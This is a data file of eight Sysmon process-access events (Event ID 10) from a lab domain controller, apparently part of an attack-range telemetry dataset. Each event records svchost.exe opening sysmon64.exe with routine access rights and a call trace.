{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1594,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
